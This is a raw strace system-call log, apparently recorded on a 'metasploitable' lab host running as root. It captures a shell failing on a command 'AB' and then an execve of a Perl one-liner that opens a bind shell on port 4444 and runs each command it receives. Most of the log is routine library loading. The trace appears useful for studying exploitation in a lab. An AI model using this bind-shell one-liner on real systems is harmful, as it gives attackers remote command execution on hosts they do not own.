10710 07:34:16.907813 open("/etc/ld.so.cache", O_RDONLY) = 1

10710 07:34:16.907825 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10710 07:34:16.907841 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0b000

10710 07:34:16.907851 close(1)          = 0

10710 07:34:16.907861 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.907875 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10710 07:34:16.907889 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10710 07:34:16.908047 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10710 07:34:16.908064 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5b000

10710 07:34:16.908075 mmap2(0xb7d63000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d63000

10710 07:34:16.908090 close(1)          = 0

10710 07:34:16.908102 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.908115 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10710 07:34:16.908130 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10710 07:34:16.908220 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10710 07:34:16.908236 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d50000

10710 07:34:16.908247 mmap2(0xb7d59000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d59000

10710 07:34:16.908262 close(1)          = 0

10710 07:34:16.908283 munmap(0xb7f0b000, 29913) = 0

10710 07:34:16.908299 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10710 07:34:16.908312 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10710 07:34:16.908323 _llseek(1, 0, [0], SEEK_CUR) = 0

10710 07:34:16.908335 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10710 07:34:16.908350 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f12000

10710 07:34:16.908361 _llseek(1, 1624, [1624], SEEK_SET) = 0

10710 07:34:16.908375 munmap(0xb7f12000, 1624) = 0

10710 07:34:16.908384 close(1)          = 0

10710 07:34:16.908459 getpgrp()         = 3831

10710 07:34:16.908470 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10710 07:34:16.908485 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10710 07:34:16.908501 brk(0x8101000)    = 0x8101000

10710 07:34:16.908545 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10710 07:34:16.908559 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10710 07:34:16.908574 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10710 07:34:16.908610 brk(0x8102000)    = 0x8102000

10710 07:34:16.908635 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10710 07:34:16.908653 stat64("/sbin/AB", 0xbfda33f8) = -1 ENOENT (No such file or directory)

10710 07:34:16.908665 stat64("/bin/AB", 0xbfda33f8) = -1 ENOENT (No such file or directory)

10710 07:34:16.908676 stat64("/usr/sbin/AB", 0xbfda33f8) = -1 ENOENT (No such file or directory)

10710 07:34:16.908688 stat64("/usr/bin/AB", 0xbfda33f8) = -1 ENOENT (No such file or directory)

10710 07:34:16.908701 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10710 07:34:16.908715 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d866f8) = 10711

10711 07:34:16.908758 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10711 07:34:16.908774 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10711 07:34:16.908787 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10711 07:34:16.908798 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10711 07:34:16.908813 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10711 07:34:16.908828 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10711 07:34:16.908841 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10711 07:34:16.908908 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10711 07:34:16.908945 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10711 07:34:16.909024 exit_group(127)   = ?

10710 07:34:16.924536 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:34:16.924579 waitpid(10710,  <unfinished ...>

10710 07:34:16.924603 <... rt_sigprocmask resumed> NULL, 8) = 0

10710 07:34:16.933936 --- SIGCHLD (Child exited) @ 0 (0) ---

10710 07:34:16.933936 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10711

10710 07:34:16.933937 waitpid(-1, 0xbfda3078, WNOHANG) = -1 ECHILD (No child processes)

10710 07:34:16.933937 sigreturn()       = ? (mask now [])

10710 07:34:16.933937 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10710 07:34:16.933937 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10710 07:34:16.933938 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10710 07:34:16.933938 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10710 07:34:16.933938 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10710 07:34:16.933938 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10710 07:34:16.933938 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10710 07:34:16.933939 stat64("/sbin/perl", 0xbfda3428) = -1 ENOENT (No such file or directory)

10710 07:34:16.933939 stat64("/bin/perl", 0xbfda3428) = -1 ENOENT (No such file or directory)

10710 07:34:16.933939 stat64("/usr/sbin/perl", 0xbfda3428) = -1 ENOENT (No such file or directory)

10710 07:34:16.933939 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10710 07:34:16.933940 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10710 07:34:16.933940 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10710 07:34:16.933949 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d866f8) = 10712

10712 07:34:16.934064 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10712 07:34:16.934080 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10712 07:34:16.934093 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10712 07:34:16.934104 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10712 07:34:16.934119 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10712 07:34:16.934134 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10712 07:34:16.934147 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10712 07:34:16.934179 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10712 07:34:16.934263 brk(0)            = 0x8153000

10712 07:34:16.934283 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10712 07:34:16.934297 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fa5000

10712 07:34:16.934313 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10712 07:34:16.934329 open("/etc/ld.so.cache", O_RDONLY) = 1

10712 07:34:16.934341 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10712 07:34:16.934358 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f9d000

10712 07:34:16.934368 close(1)          = 0

10712 07:34:16.934378 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10712 07:34:16.934393 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10712 07:34:16.934407 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10712 07:34:16.934570 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10712 07:34:16.934588 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f99000

10712 07:34:16.934600 mmap2(0xb7f9b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f9b000

10712 07:34:16.934619 close(1)          = 0

10712 07:34:16.934630 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10712 07:34:16.934644 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10712 07:34:16.934658 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10712 07:34:16.934744 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10712 07:34:16.934761 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f74000

10712 07:34:16.934772 mmap2(0xb7f97000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f97000

10712 07:34:16.934787 close(1)          = 0

10712 07:34:16.934799 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10712 07:34:16.934812 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10712 07:34:16.934826 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10712 07:34:16.934910 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10712 07:34:16.934927 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f73000

10712 07:34:16.934939 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5b000

10712 07:34:16.934959 mmap2(0xb7f6f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f6f000

10712 07:34:16.934976 mmap2(0xb7f71000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f71000

10712 07:34:16.935016 close(1)          = 0

10712 07:34:16.935028 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10712 07:34:16.935055 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10712 07:34:16.935069 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10712 07:34:16.935158 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10712 07:34:16.935176 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0c000

10712 07:34:16.935187 mmap2(0xb7f55000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f55000

10712 07:34:16.935201 mmap2(0xb7f58000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f58000

10712 07:34:16.935214 close(1)          = 0

10712 07:34:16.935225 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10712 07:34:16.935238 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10712 07:34:16.935252 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10712 07:34:16.935339 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10712 07:34:16.935355 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dda000

10712 07:34:16.935366 mmap2(0xb7de3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7de3000

10712 07:34:16.935380 mmap2(0xb7de5000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7de5000

10712 07:34:16.935394 close(1)          = 0

10712 07:34:16.935416 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dd9000

10712 07:34:16.935429 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd98c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10712 07:34:16.935523 mprotect(0xb7f55000, 4096, PROT_READ) = 0

10712 07:34:16.935566 munmap(0xb7f9d000, 29913) = 0

10712 07:34:16.935579 set_tid_address(0xb7dd9908) = 10712

10712 07:34:16.935588 set_robust_list(0xb7dd9910, 0xc) = 0

10712 07:34:16.935597 futex(0xbfbe9080, 0x81 /* FUTEX_??? */, 1) = 0

10712 07:34:16.935611 rt_sigaction(SIGRTMIN, {0xb7f5f2c0, [], SA_SIGINFO}, NULL, 8) = 0

10712 07:34:16.935624 rt_sigaction(SIGRT_1, {0xb7f5f340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10712 07:34:16.935637 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10712 07:34:16.935653 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10712 07:34:16.935672 uname({sys="Linux", node="metasploitable", ...}) = 0

10712 07:34:16.935719 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10712 07:34:16.935764 brk(0)            = 0x8153000

10712 07:34:16.935773 brk(0x8174000)    = 0x8174000

10712 07:34:16.935814 getuid32()        = 0

10712 07:34:16.935824 geteuid32()       = 0

10712 07:34:16.935833 getgid32()        = 0

10712 07:34:16.935842 getegid32()       = 0

10712 07:34:16.935877 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db8000

10712 07:34:16.935902 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10712 07:34:16.935919 read(1, "\353\231Np", 4) = 4

10712 07:34:16.935932 close(1)          = 0

10712 07:34:16.935960 time(NULL)        = 1495625656

10712 07:34:16.936080 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfbe8d50) = -1 ENOENT (No such file or directory)

10712 07:34:16.936101 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfbe8d50) = -1 ENOENT (No such file or directory)

10712 07:34:16.936114 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfbe8d50) = -1 ENOENT (No such file or directory)

10712 07:34:16.936130 stat64("/usr/local/lib/perl/5.8.7", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936143 stat64("/usr/local/share/perl/5.8.7", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936169 stat64("/usr/local/lib/perl/5.8.6", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936180 stat64("/usr/local/share/perl/5.8.6", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

